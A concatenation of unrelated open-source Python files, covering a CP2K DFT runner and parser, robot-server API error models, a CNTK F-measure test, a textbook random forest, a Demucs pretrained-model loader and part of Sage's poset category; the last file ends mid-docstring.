columns=['scene loading', 'serialization', 'deserialization'],
index=scene_names)
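# each row is a scene and each column a setup phase; values are wall-clock seconds from timeit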
for scene_name in scene_names:
lm.reset()
lm.load_film('film_output', 'bitmap', {
'w': 1920,
'h': 1080
})
# Load the scene without serialization
def load_scene():
accel = lm.load_accel('accel', 'sahbvh', {})
scene = lm.load_scene('scene', 'default', {
'accel': accel.loc()
})
lmscene.load(scene, env.scene_path, scene_name)
loading_time_without_serialization = timeit.timeit(stmt=load_scene, number=1)
    scene_setup_time_df.loc[scene_name, 'scene loading'] = loading_time_without_serialization
# Export the internal state to a file
def serialize_scene():
lm.save_state_to_file('lm.serialized')
serialization_time = timeit.timeit(stmt=serialize_scene, number=1)
    scene_setup_time_df.loc[scene_name, 'serialization'] = serialization_time
# Import the internal state from the serialized file
lm.reset()
def deserialize_scene():
lm.load_state_from_file('lm.serialized')
deserialization_time = timeit.timeit(stmt=deserialize_scene, number=1)
    scene_setup_time_df.loc[scene_name, 'deserialization'] = deserialization_time
scene_setup_time_df
|
flare/dft_interface/cp2k_util.py | aaronchen0316/flare | 144 | 12610001 | """
This module is used to call a CP2K simulation and parse its output.
The user needs to supply a complete input script with an ENERGY_FORCE or ENERGY run type, and CELL and COORD blocks. Example scripts can be found in tests/test_files/cp2k_input...
The module copies the input template to a new file with a "_run" suffix,
edits the atomic coordinates in the COORD block and runs the simulation with
the given parallel setup.
Note that, if the CP2K executable only supports serial runs, using it together with an MPI setting can lead to repeated output in the output file, a wrong number of forces and errors in the other modules.
"""
import os
from subprocess import call
import time
import numpy as np
from flare import output
from flare import struc
from typing import List
name = "CP2K"
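# Minimal usage sketch (illustrative only: the template file name, executable path and
# the `struct` Structure object are assumptions, not provided by this module):
#
#     forces = run_dft_par("cp2k_input.inp", struct, dft_loc="cp2k.popt", ncpus=4)
#     forces, energy = run_dft_en_par("cp2k_input.inp", struct, "cp2k.popt", ncpus=4)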
def run_dft_par(
dft_input,
structure,
dft_loc,
ncpus=1,
dft_out="dft.out",
npool=None,
mpi="mpi",
**dft_kwargs,
):
"""run DFT calculation with given input template
    and atomic configurations. If ncpus == 1, it executes a serial run.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param ncpus: # of CPU for mpi
:param dft_out: output file name
    :param npool: not used
    :param mpi: "mpi" to launch the parallel run with mpirun, any other value to use srun
    :param **dft_kwargs: not used
:return: forces
"""
newfilename = edit_dft_input_positions(dft_input, structure)
dft_command = f"{dft_loc} -i {newfilename}"
if ncpus > 1:
if mpi == "mpi":
dft_command = f"mpirun -np {ncpus} {dft_command}"
else:
dft_command = f"srun -n {ncpus} {dft_command}"
# output.write_to_output(dft_command+'\n')
with open(dft_out, "w+") as fout:
call(dft_command.split(), stdout=fout)
os.remove(newfilename)
return parse_dft_forces(dft_out)
def run_dft_en_par(
dft_input: str,
structure,
dft_loc: str,
ncpus: int,
dft_out: str = "dft.out",
npool: int = None,
mpi: str = "mpi",
**dft_kwargs,
):
"""run DFT calculation with given input template
and atomic configurations. This function is not used atm.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param ncpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
    :param **dft_kwargs: not used
:return: forces, energy
"""
newfilename = edit_dft_input_positions(dft_input, structure)
dft_command = f"{dft_loc} -i {newfilename} > {dft_out}"
if ncpus > 1:
dft_command = f"mpirun -np {ncpus} {dft_command}"
# output.write_to_output(dft_command+'\n')
call(dft_command, shell=True)
os.remove(newfilename)
forces, energy = parse_dft_forces_and_energy(dft_out)
return forces, energy
def parse_dft_input(dft_input: str):
"""Parse CP2K input file prepared by the user
    The parser is very limited; the user has to follow
    the expected format closely.
It requires the "CELL", "COORD" blocks
:param dft_input: file name
:return: positions, species, cell, masses
"""
positions = []
species = []
cell = []
with open(dft_input) as f:
lines = f.readlines()
# Find the cell and positions in the output file
cell_index = None
positions_index = None
nat = None
# species_index = None
for i, line in enumerate(lines):
if "&CELL" in line:
cell_index = int(i + 1)
elif "COORD" in line and "END" not in line:
positions_index = int(i + 1)
elif "&END" in line and (positions_index is not None) and (nat is None):
nat = i - positions_index
# if 'ATOMIC_SPECIES' in line:
# species_index = int(i + 1)
assert cell_index is not None, "Failed to find cell in input"
assert positions_index is not None, "Failed to find positions in input"
assert nat is not None, "Failed to find number of atoms in input"
# Load cell
# TO DO: allow to mess up the order of A, B, and C
for i in range(cell_index, cell_index + 3):
cell_line = list(map(float, lines[i].split()[1:]))
cell.append(cell_line) # np.fromstring(cell_line[1:], sep=' '))
cell = np.array(cell)
# Check cell IO
assert len(cell) != 0, "Cell failed to load"
assert np.shape(cell) == (3, 3), "Cell failed to load correctly"
# Load positions
for i in range(positions_index, positions_index + nat):
pos_line = lines[i].split()
species.append(pos_line[0])
# positions.append(np.fromstring(pos_string, sep=' '))
positions.append(list(map(float, pos_line[1:])))
# Check position IO
assert positions != [], "Positions failed to load"
positions = np.array(positions)
# see conversions.nb for conversion from amu to md units
ele_mass = {
"H": 1.007900,
"He": 4.002600,
"Li": 6.941000,
"Be": 9.012200,
"B": 10.811000,
"C": 12.010700,
"N": 14.006700,
"O": 15.999400,
"F": 18.998400,
"Ne": 20.179700,
"Na": 22.989700,
"Mg": 24.305000,
"Al": 26.981500,
"Si": 28.085500,
"P": 30.973800,
"S": 32.065000,
"Cl": 35.453000,
"K": 39.098300,
"Ar": 39.948000,
"Ca": 40.078000,
"Sc": 44.955900,
"Ti": 47.867000,
"V": 50.941500,
"Cr": 51.996100,
"Mn": 54.938000,
"Fe": 55.845000,
"Ni": 58.693400,
"Co": 58.933200,
"Cu": 63.546000,
"Zn": 65.390000,
"Ga": 69.723000,
"Ge": 72.640000,
"As": 74.921600,
"Se": 78.960000,
"Br": 79.904000,
"Kr": 83.800000,
"Rb": 85.467800,
"Sr": 87.620000,
"Y": 88.905900,
"Zr": 91.224000,
"Nb": 92.906400,
"Mo": 95.940000,
"Tc": 98.000000,
"Ru": 101.070000,
"Rh": 102.905500,
"Pd": 106.420000,
"Ag": 107.868200,
"Cd": 112.411000,
"In": 114.818000,
"Sn": 118.710000,
"Sb": 121.760000,
"I": 126.904500,
"Te": 127.600000,
"Xe": 131.293000,
"Cs": 132.905500,
"Ba": 137.327000,
"La": 138.905500,
"Ce": 140.116000,
"Pr": 140.907700,
"Nd": 144.240000,
"Pm": 145.000000,
"Sm": 150.360000,
"Eu": 151.964000,
"Gd": 157.250000,
"Tb": 158.925300,
"Dy": 162.500000,
"Ho": 164.930300,
"Er": 167.259000,
"Tm": 168.934200,
"Yb": 173.040000,
"Lu": 174.967000,
"Hf": 178.490000,
"Ta": 180.947900,
"W": 183.840000,
"Re": 186.207000,
"Os": 190.230000,
"Ir": 192.217000,
"Pt": 195.078000,
"Au": 196.966500,
"Hg": 200.590000,
"Tl": 204.383300,
"Pb": 207.200000,
"Bi": 208.980400,
"Po": 209.000000,
"At": 210.000000,
"Rn": 222.000000,
"Fr": 223.000000,
"Ra": 226.000000,
"Ac": 227.000000,
"Pa": 231.035900,
"Th": 232.038100,
"Np": 237.000000,
"U": 238.028900,
"Am": 243.000000,
"Pu": 244.000000,
"Cm": 247.000000,
"Bk": 247.000000,
"Cf": 251.000000,
"Es": 252.000000,
"Fm": 257.000000,
"Md": 258.000000,
"No": 259.000000,
"Rf": 261.000000,
"Lr": 262.000000,
"Db": 262.000000,
"Bh": 264.000000,
"Sg": 266.000000,
"Mt": 268.000000,
"Rg": 272.000000,
"Hs": 277.000000,
}
    # TODO: allow customized masses
massconvert = 0.000103642695727
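    # conversion factor from amu to the internal md mass units (see conversions.nb)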
masses = {}
for ele in ele_mass.keys():
        # convert each element's mass from amu to the internal md units
masses[ele] = ele_mass[ele] * massconvert
return positions, species, cell, masses
def dft_input_to_structure(dft_input: str):
"""
    Parses a CP2K input and returns the atoms in the file as a Structure object
:param dft_input: input file to parse
:return: atomic structure
"""
positions, species, cell, masses = parse_dft_input(dft_input)
_, coded_species = struc.get_unique_species(species)
return struc.Structure(
positions=positions,
species=coded_species,
cell=cell,
mass_dict=masses,
species_labels=species,
)
def edit_dft_input_positions(dft_input: str, structure):
"""Write the current configuration of the OTF structure to the
    CP2K input file.
    :param dft_input: input file name
:param structure: structure to print
:type structure: class Structure
    :return newfilename: the name of the edited input file,
        with the "_run" suffix
"""
with open(dft_input, "r") as f:
lines = f.readlines()
file_pos_index = None
cell_index = None
nat = None
for i, line in enumerate(lines):
if "&CELL" in line:
cell_index = int(i + 1)
if "&COORD" in line:
file_pos_index = int(i + 1)
if "&END" in line and (file_pos_index is not None):
nat = i - file_pos_index
# if 'ATOMIC_SPECIES' in line:
# species_index = int(i + 1)
assert file_pos_index is not None, "Failed to find positions in input"
assert cell_index is not None, "Failed to find cell in input"
assert nat is not None, "Failed to find nat in input"
for pos_index, line_index in enumerate(
range(file_pos_index, file_pos_index + structure.nat)
):
pos = structure.positions[pos_index]
specs = structure.species_labels[pos_index]
pos_string = f"{specs} {pos[0]} {pos[1]} {pos[2]}\n"
if line_index < len(lines):
lines[line_index] = pos_string
else:
lines.append(pos_string)
# # TODO current assumption: if there is a new structure, then the new
# # structure has fewer atoms than the previous one. If we are always
# # 'editing' a version of the larger structure than this will be okay with
# # the punchout method.
# for line_index in range(file_pos_index + structure.nat,
# file_pos_index + nat):
# lines[line_index] = ''
lines[cell_index] = "A " + " ".join([str(x) for x in structure.vec1]) + "\n"
lines[cell_index + 1] = "B " + " ".join([str(x) for x in structure.vec2]) + "\n"
lines[cell_index + 2] = "C " + " ".join([str(x) for x in structure.vec3]) + "\n"
newfilename = dft_input + "_run"
with open(newfilename, "w") as f:
for line in lines:
f.write(line)
return newfilename
def parse_dft_forces_and_energy(outfile: str):
    """Get forces and energy from a CP2K output file in eV/A.
    The run type of the input has to be ENERGY_FORCE.
:param outfile: str, Path to dft.output file
:return: list[nparray] , List of forces acting on atoms
:return: float, total potential energy
"""
forces = []
total_energy = np.nan
startforce = -1
with open(outfile, "r") as outf:
for line in outf:
if line.find("FORCE_EVAL") != -1:
total_energy = float(line.split()[8])
if startforce >= 2:
if line.find("SUM") != -1:
startforce = -1
else:
line = line.split()[3:]
forces.append(list(map(float, line)))
startforce += 1
elif startforce >= 0:
startforce += 1
elif line.find("FORCES") != -1 and line.find("in") != -1:
startforce = 0
    assert not np.isnan(total_energy), (
        f"dft parser failed to read the file {outfile}. Run failed."
    )
    # Convert forces from Ha/Bohr (atomic units) to eV/Angstrom
conversion_factor = 25.71104309541616 * 2.0
forces = np.array(forces) * conversion_factor
total_energy *= 27.2114
return forces, total_energy
def parse_dft_forces(outfile: str):
    """Get forces from a CP2K output file in eV/A
:param outfile: str, Path to dft.output file
:return: list[nparray] , List of forces acting on atoms
"""
f, e = parse_dft_forces_and_energy(outfile)
return f
|
robot-server/robot_server/errors/error_responses.py | knownmed/opentrons | 235 | 12610013 | """JSON API errors and response models."""
from pydantic import BaseModel, Field
from pydantic.generics import GenericModel
from typing import Any, Dict, Generic, Optional, Sequence, Tuple, TypeVar
from robot_server.service.json_api import ResourceLinks
class ApiError(Exception):
"""An exception to throw when an endpoint should respond with an error."""
    def __init__(self, status_code: int, content: Dict[str, Any]) -> None:
        """Initialize the exception.
Arguments:
status_code: The status code of the response
content: The JSON response body
"""
self.status_code = status_code
self.content = content
class BaseErrorResponse(BaseModel):
"""Base class for error response bodies."""
def as_error(self, status_code: int) -> ApiError:
"""Serialize the response as an API error to raise in a handler."""
return ApiError(
status_code=status_code,
content=self.dict(exclude_none=True),
)
class ErrorSource(BaseModel):
"""An object containing references to the source of the error."""
pointer: Optional[str] = Field(
None,
description=(
"A JSON Pointer [RFC6901] to the associated entity in the request document."
),
)
parameter: Optional[str] = Field(
None,
        description="A string indicating which URI query parameter caused the error.",
)
header: Optional[str] = Field(
None,
description="A string indicating which header caused the error.",
)
class ErrorDetails(BaseErrorResponse):
    """An error response with error type and occurrence details.
Extend this class to create specific error responses, and use it in your
route handlers.
Example:
from fastapi import status
from typing_extensions import Literal
from robot_server.errors import ErrorResponse, ErrorDetails
class BadRequest(ErrorDetails):
id: Literal["BadRequest"] = "BadRequest"
title: str = "Bad Request"
# ...
@router.get(
path="/some/path",
response_model=SomeModel,
responses={
status.HTTP_400_BAD_REQUEST: {"model": ErrorResponse[BadRequest]},
}
)
def get_some_model():
# ...
raise BadRequest.as_error(status.HTTP_400_BAD_REQUEST)
"""
id: str = Field(
...,
description="A unique identifier for this type of error.",
)
title: str = Field(
...,
description="A short, human readable name for this type of error",
)
detail: str = Field(
...,
        description=(
            "A human-readable message describing this specific occurrence "
"of the error."
),
)
source: Optional[ErrorSource] = Field(
None,
description="An object containing references to the source of the error.",
)
meta: Optional[Dict[str, Any]] = Field(
None,
        description=(
            "An object containing non-standard information about this "
            "occurrence of the error"
),
)
    def as_error(self, status_code: int) -> ApiError:
        """Serialize this ErrorDetails as an ApiError via an ErrorResponse."""
return ErrorResponse(errors=(self,)).as_error(status_code)
ErrorDetailsT = TypeVar("ErrorDetailsT", bound=ErrorDetails)
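# type variable bound to ErrorDetails so generic responses can be parameterized by a concrete error type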
class LegacyErrorResponse(BaseErrorResponse):
"""An error response with a human readable message."""
message: str = Field(
...,
description="A human-readable message describing the error.",
)
class ErrorResponse(BaseErrorResponse, GenericModel, Generic[ErrorDetailsT]):
"""A response body for a single error."""
errors: Tuple[ErrorDetailsT] = Field(..., description="Error details.")
links: Optional[ResourceLinks] = Field(
None,
        description=(
            "Links that lead to further details about "
"this particular occurrence of the problem."
),
)
class MultiErrorResponse(BaseErrorResponse, GenericModel, Generic[ErrorDetailsT]):
    """A response body for multiple errors."""
errors: Sequence[ErrorDetailsT] = Field(..., description="Error details.")
links: Optional[ResourceLinks] = Field(
None,
        description=(
            "Links that lead to further details about "
"this particular occurrence of the problem."
),
)
|
bindings/python/cntk/losses/tests/fmeasure_test.py | shyamalschandra/CNTK | 17,702 | 12610029 | <reponame>shyamalschandra/CNTK
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
"""
Unit tests for the fmeasure class.
"""
import numpy as np
import cntk as C
from _cntk_py import set_fixed_random_seed
import pytest
from os import environ
@pytest.mark.skipif(environ.get('TEST_TAG') is not None and environ['TEST_TAG'] in {'weekly', 'nightly'}, reason="Temporarily disabled this test in the Nightly/Weekly builds due to random failures.")
def test_fmeasure():
a = np.array([[[[1., 1., 1., 0., 0.],
[1., 1., 1., 0., 0.],
[1., 1., 1., 0., 0.],
[1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]], dtype=np.float32)
b = np.array([[[[1., 1., 1., 0., 0.],
[1., 1., 0., 0., 0.],
[0., 0., 0., 1., 1.],
[0., 0., 0., 1., 1.],
[0., 0., 0., 0., 1.]]]], dtype=np.float32)
set_fixed_random_seed(1)
input_dim = (1, 5, 5)
input_tensor = C.input_variable(input_dim)
target_tensor = C.input_variable(input_dim)
z = C.fmeasure(input_tensor, target_tensor)
score = z.eval({input_tensor: a, target_tensor: b})
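    # a and b each contain 10 positive pixels and overlap in 5, so the F-measure is 2*5/(10+10) = 0.5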
FMEASURE_EXPECTED_VALUES = [[[[0.5]]]]
assert np.allclose(score, FMEASURE_EXPECTED_VALUES)
|
Ch13/randomforest.py | jason-168/MLCode | 146 | 12610031 | <filename>Ch13/randomforest.py
# Code from Chapter 13 of Machine Learning: An Algorithmic Perspective (2nd Edition)
# by <NAME> (http://stephenmonika.net)
# You are free to use, change, or redistribute the code in any way you wish for
# non-commercial purposes, but please maintain the name of the original author.
# This code comes with no warranty of any kind.
# <NAME>, 2014
import numpy as np
import dtree
class randomforest:
"""The random forest algorithm based on the decision tree of Chapter 6"""
def __init__(self):
""" Constructor """
self.tree = dtree.dtree()
def rf(self,data,targets,features,nTrees,nSamples,nFeatures,maxlevel=5):
nPoints = np.shape(data)[0]
nDim = np.shape(data)[1]
self.nSamples = nSamples
self.nTrees = nTrees
classifiers = []
for i in range(nTrees):
            print(i)
# Compute bootstrap samples
samplePoints = np.random.randint(0,nPoints,(nPoints,nSamples))
for j in range(nSamples):
sample = []
sampleTarget = []
for k in range(nPoints):
sample.append(data[samplePoints[k,j]])
sampleTarget.append(targets[samplePoints[k,j]])
# Train classifiers
classifiers.append(self.tree.make_tree(sample,sampleTarget,features,maxlevel,forest=nFeatures))
return classifiers
def rfclass(self,classifiers,data):
decision = []
# Majority voting
for j in range(len(data)):
outputs = []
#print data[j]
for i in range(self.nTrees):
out = self.tree.classify(classifiers[i],data[j])
if out is not None:
outputs.append(out)
# List the possible outputs
out = []
for each in outputs:
if out.count(each)==0:
out.append(each)
frequency = np.zeros(len(out))
index = 0
if len(out)>0:
for each in out:
frequency[index] = outputs.count(each)
index += 1
decision.append(out[frequency.argmax()])
else:
decision.append(None)
return decision
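# Minimal usage sketch (illustrative only: `data`, `targets`, `features` and `testdata`
# are assumed to be prepared as for the accompanying dtree module from the book code):
#
#     rf = randomforest()
#     classifiers = rf.rf(data, targets, features, nTrees=10, nSamples=len(data), nFeatures=3)
#     predictions = rf.rfclass(classifiers, testdata)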
|
demucs/pretrained.py | KilianRuiz2B/demucs | 3,013 | 12610057 | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
# author: adefossez
import logging
from diffq import DiffQuantizer
import torch.hub
from .model import Demucs
from .tasnet import ConvTasNet
from .utils import set_state
logger = logging.getLogger(__name__)
ROOT = "https://dl.fbaipublicfiles.com/demucs/v3.0/"
PRETRAINED_MODELS = {
'demucs': 'e07c671f',
'demucs48_hq': '28a1282c',
'demucs_extra': '3646af93',
'demucs_quantized': '07afea75',
'tasnet': 'beb46fac',
'tasnet_extra': 'df3777b2',
'demucs_unittest': '09ebc15f',
}
SOURCES = ["drums", "bass", "other", "vocals"]
def get_url(name):
sig = PRETRAINED_MODELS[name]
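    # e.g. "demucs" -> https://dl.fbaipublicfiles.com/demucs/v3.0/demucs-e07c671f.th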
return ROOT + name + "-" + sig[:8] + ".th"
def is_pretrained(name):
return name in PRETRAINED_MODELS
def load_pretrained(name):
if name == "demucs":
return demucs(pretrained=True)
elif name == "demucs48_hq":
return demucs(pretrained=True, hq=True, channels=48)
elif name == "demucs_extra":
return demucs(pretrained=True, extra=True)
elif name == "demucs_quantized":
return demucs(pretrained=True, quantized=True)
elif name == "demucs_unittest":
return demucs_unittest(pretrained=True)
elif name == "tasnet":
return tasnet(pretrained=True)
elif name == "tasnet_extra":
return tasnet(pretrained=True, extra=True)
else:
raise ValueError(f"Invalid pretrained name {name}")
def _load_state(name, model, quantizer=None):
url = get_url(name)
state = torch.hub.load_state_dict_from_url(url, map_location='cpu', check_hash=True)
set_state(model, quantizer, state)
if quantizer:
quantizer.detach()
def demucs_unittest(pretrained=True):
model = Demucs(channels=4, sources=SOURCES)
if pretrained:
_load_state('demucs_unittest', model)
return model
def demucs(pretrained=True, extra=False, quantized=False, hq=False, channels=64):
if not pretrained and (extra or quantized or hq):
raise ValueError("if extra or quantized is True, pretrained must be True.")
model = Demucs(sources=SOURCES, channels=channels)
if pretrained:
name = 'demucs'
if channels != 64:
name += str(channels)
quantizer = None
if sum([extra, quantized, hq]) > 1:
raise ValueError("Only one of extra, quantized, hq, can be True.")
if quantized:
quantizer = DiffQuantizer(model, group_size=8, min_size=1)
name += '_quantized'
if extra:
name += '_extra'
if hq:
name += '_hq'
_load_state(name, model, quantizer)
return model
def tasnet(pretrained=True, extra=False):
if not pretrained and extra:
raise ValueError("if extra is True, pretrained must be True.")
model = ConvTasNet(X=10, sources=SOURCES)
if pretrained:
name = 'tasnet'
if extra:
name = 'tasnet_extra'
_load_state(name, model)
return model
|
src/sage/categories/posets.py | UCD4IDS/sage | 1,742 | 12610070 | <filename>src/sage/categories/posets.py
r"""
Posets
"""
#*****************************************************************************
# Copyright (C) 2011 <NAME> <nthiery at users.sf.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# http://www.gnu.org/licenses/
#******************************************************************************
from sage.misc.cachefunc import cached_method
from sage.misc.abstract_method import abstract_method
from sage.misc.lazy_import import LazyImport
from sage.categories.category import Category
from sage.categories.sets_cat import Sets
class Posets(Category):
r"""
The category of posets i.e. sets with a partial order structure.
EXAMPLES::
sage: Posets()
Category of posets
sage: Posets().super_categories()
[Category of sets]
sage: P = Posets().example(); P
An example of a poset: sets ordered by inclusion
The partial order is implemented by the mandatory method
:meth:`~Posets.ParentMethods.le`::
sage: x = P(Set([1,3])); y = P(Set([1,2,3]))
sage: x, y
({1, 3}, {1, 2, 3})
sage: P.le(x, y)
True
sage: P.le(x, x)
True
sage: P.le(y, x)
False
The other comparison methods are called
:meth:`~Posets.ParentMethods.lt`, :meth:`~Posets.ParentMethods.ge`,
:meth:`~Posets.ParentMethods.gt`, following Python's naming
convention in :mod:`operator`. Default implementations are
provided::
sage: P.lt(x, x)
False
sage: P.ge(y, x)
True
Unless the poset is a facade (see :class:`Sets.Facade`), one can
compare directly its elements using the usual Python operators::
sage: D = Poset((divisors(30), attrcall("divides")), facade = False)
sage: D(3) <= D(6)
True
sage: D(3) <= D(3)
True
sage: D(3) <= D(5)
False
sage: D(3) < D(3)
False
sage: D(10) >= D(5)
True
At this point, this has to be implemented by hand. Once
:trac:`10130` will be resolved, this will be automatically
provided by this category::
sage: x < y # todo: not implemented
True
sage: x < x # todo: not implemented
False
sage: x <= x # todo: not implemented
True
sage: y >= x # todo: not implemented
True
.. SEEALSO:: :func:`Poset`, :class:`FinitePosets`, :class:`LatticePosets`
TESTS::
sage: C = Posets()
sage: TestSuite(C).run()
"""
@cached_method
def super_categories(self):
r"""
Return a list of the (immediate) super categories of
``self``, as per :meth:`Category.super_categories`.
EXAMPLES::
sage: Posets().super_categories()
[Category of sets]
"""
return [Sets()]
def example(self, choice = None):
r"""
Return examples of objects of ``Posets()``, as per
:meth:`Category.example()
<sage.categories.category.Category.example>`.
EXAMPLES::
sage: Posets().example()
An example of a poset: sets ordered by inclusion
sage: Posets().example("facade")
An example of a facade poset: the positive integers ordered by divisibility
"""
from sage.categories.examples.posets import FiniteSetsOrderedByInclusion, PositiveIntegersOrderedByDivisibilityFacade
if choice == "facade":
return PositiveIntegersOrderedByDivisibilityFacade()
else:
return FiniteSetsOrderedByInclusion()
def __iter__(self):
r"""
Iterator over representatives of the isomorphism classes of
posets with finitely many vertices.
        .. warning:: this feature may become deprecated, since it does
           not, of course, iterate through all posets.
EXAMPLES::
sage: P = Posets()
sage: it = iter(P)
sage: for _ in range(10): print(next(it))
Finite poset containing 0 elements
Finite poset containing 1 elements
Finite poset containing 2 elements
Finite poset containing 2 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 3 elements
Finite poset containing 4 elements
"""
from sage.combinat.posets.posets import FinitePosets_n
n = 0
while True:
for P in FinitePosets_n(n):
yield P
n += 1
Finite = LazyImport('sage.categories.finite_posets', 'FinitePosets')
class ParentMethods:
@abstract_method
def le(self, x, y):
r"""
Return whether `x \le y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.le( 3, 6 )
True
sage: D.le( 3, 3 )
True
sage: D.le( 3, 5 )
False
"""
def lt(self, x, y):
r"""
Return whether `x < y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
This default implementation delegates the work to :meth:`le`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.lt( 3, 6 )
True
sage: D.lt( 3, 3 )
False
sage: D.lt( 3, 5 )
False
"""
return self.le(x,y) and x != y
def ge(self, x, y):
r"""
Return whether `x \ge y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
This default implementation delegates the work to :meth:`le`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.ge( 6, 3 )
True
sage: D.ge( 3, 3 )
True
sage: D.ge( 3, 5 )
False
"""
return self.le(y,x)
def gt(self, x, y):
r"""
Return whether `x > y` in the poset ``self``.
INPUT:
- ``x``, ``y`` -- elements of ``self``.
This default implementation delegates the work to :meth:`lt`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.gt( 3, 6 )
False
sage: D.gt( 3, 3 )
False
sage: D.gt( 3, 5 )
False
"""
return self.lt(y,x)
@abstract_method(optional = True)
def upper_covers(self, x):
r"""
Return the upper covers of `x`, that is, the elements `y`
such that `x<y` and there exists no `z` such that `x<z<y`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.upper_covers(3)
[6, 15]
"""
@abstract_method(optional = True)
def lower_covers(self, x):
r"""
Return the lower covers of `x`, that is, the elements `y`
such that `y<x` and there exists no `z` such that `y<z<x`.
EXAMPLES::
sage: D = Poset((divisors(30), attrcall("divides")))
sage: D.lower_covers(15)
[3, 5]
"""
@abstract_method(optional = True)
def order_ideal(self, elements):
r"""
Return the order ideal in ``self`` generated by the elements
of an iterable ``elements``.
A subset `I` of a poset is said to be an order ideal if, for
any `x` in `I` and `y` such that `y \le x`, then `y` is in `I`.
This is also called the lower set generated by these elements.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.order_ideal([7,10])
[0, 1, 2, 3, 4, 5, 6, 7, 8, 10]
"""
@abstract_method(optional = True)
def order_filter(self, elements):
r"""
Return the order filter generated by a list of elements.
A subset `I` of a poset is said to be an order filter if, for
any `x` in `I` and `y` such that `y \ge x`, then `y` is in `I`.
This is also called the upper set generated by these elements.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.order_filter([3,8])
[3, 7, 8, 9, 10, 11, 12, 13, 14, 15]
"""
def directed_subset(self, elements, direction):
r"""
Return the order filter or the order ideal generated by a
list of elements.
If ``direction`` is 'up', the order filter (upper set) is
being returned.
If ``direction`` is 'down', the order ideal (lower set) is
being returned.
INPUT:
- elements -- a list of elements.
- direction -- 'up' or 'down'.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.directed_subset([3, 8], 'up')
[3, 7, 8, 9, 10, 11, 12, 13, 14, 15]
sage: B.directed_subset([7, 10], 'down')
[0, 1, 2, 3, 4, 5, 6, 7, 8, 10]
"""
if direction == 'up':
return self.order_filter(elements)
if direction == 'down':
return self.order_ideal(elements)
raise ValueError("Direction must be either 'up' or 'down'.")
def principal_order_ideal(self, x):
r"""
Return the order ideal generated by an element ``x``.
This is also called the lower set generated by this element.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.principal_order_ideal(6)
[0, 2, 4, 6]
"""
return self.order_ideal([x])
principal_lower_set = principal_order_ideal
def principal_order_filter(self, x):
r"""
Return the order filter generated by an element ``x``.
This is also called the upper set generated by this element.
EXAMPLES::
sage: B = posets.BooleanLattice(4)
sage: B.principal_order_filter(2)
[2, 3, 6, 7, 10, 11, 14, 15]
"""
return self.order_filter([x])
principal_upper_set = principal_order_filter
def order_ideal_toggle(self, I, v):
r"""
Return the result of toggling the element ``v`` in the
order ideal ``I``.
If `v` is an element of a poset `P`, then toggling the
element `v` is an automorphism of the set `J(P)` of all
order ideals of `P`. It is defined as follows: If `I`
is an order ideal of `P`, then the image of `I` under
toggling the element `v` is
- the set `I \cup \{ v \}`, if `v \not\in I` but
every element of `P` smaller than `v` is in `I`;
- the set `I \setminus \{ v \}`, if `v \in I` but
no element of `P` greater than `v` is in `I`;
- `I` otherwise.
This image always is an order ideal of `P`.
EXAMPLES::
sage: P = Poset({1: [2,3], 2: [4], 3: []})
sage: I = Set({1, 2})
sage: I in P.order_ideals_lattice()
True
sage: P.order_ideal_toggle(I, 1)
{1, 2}
sage: P.order_ideal_toggle(I, 2)
{1}
sage: P.order_ideal_toggle(I, 3)
{1, 2, 3}
sage: P.order_ideal_toggle(I, 4)
{1, 2, 4}
sage: P4 = Posets(4)
sage: all(all(all(P.order_ideal_toggle(P.order_ideal_toggle(I, i), i) == I
....: for i in range(4))
....: for I in P.order_ideals_lattice(facade=True))
....: for P in P4)
True
"""
if v not in I:
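                # v can be added only if every lower cover of v is already in I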
if all(u in I for u in self.lower_covers(v)):
from sage.sets.set import Set
return I.union(Set({v}))
else:
if all(u not in I for u in self.upper_covers(v)):
from sage.sets.set import Set
return I.difference(Set({v}))
return I
def order_ideal_toggles(self, I, vs):
r"""
Return the result of toggling the elements of the list (or
iterable) ``vs`` (one by one, from left to right) in the order
ideal ``I``.
See :meth:`order_ideal_toggle` for a definition of toggling.
EXAMPLES::
sage: P = Poset({1: [2,3], 2: [4], 3: []})
sage: I = Set({1, 2})
sage: P.order_ideal_toggles(I, [1,2,3,4])
{1, 3}
sage: P.order_ideal_toggles(I, (1,2,3,4))
{1, 3}
"""
for v in vs:
I = self.order_ideal_toggle(I, v)
return I
def is_order_ideal(self, o):
"""
Return whether ``o`` is an order ideal of ``self``, assuming ``self``
has no infinite descending path.
INPUT:
- ``o`` -- a list (or set, or tuple) containing some elements of ``self``
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_order_ideal([1, 3])
True
sage: P.is_order_ideal([])
True
sage: P.is_order_ideal({1, 3})
True
sage: P.is_order_ideal([1, 3, 4])
False
"""
return all((u in self and all(x in o for x in self.lower_covers(u))) for u in o)
def is_order_filter(self, o):
"""
Return whether ``o`` is an order filter of ``self``, assuming ``self``
has no infinite ascending path.
INPUT:
- ``o`` -- a list (or set, or tuple) containing some elements of ``self``
EXAMPLES::
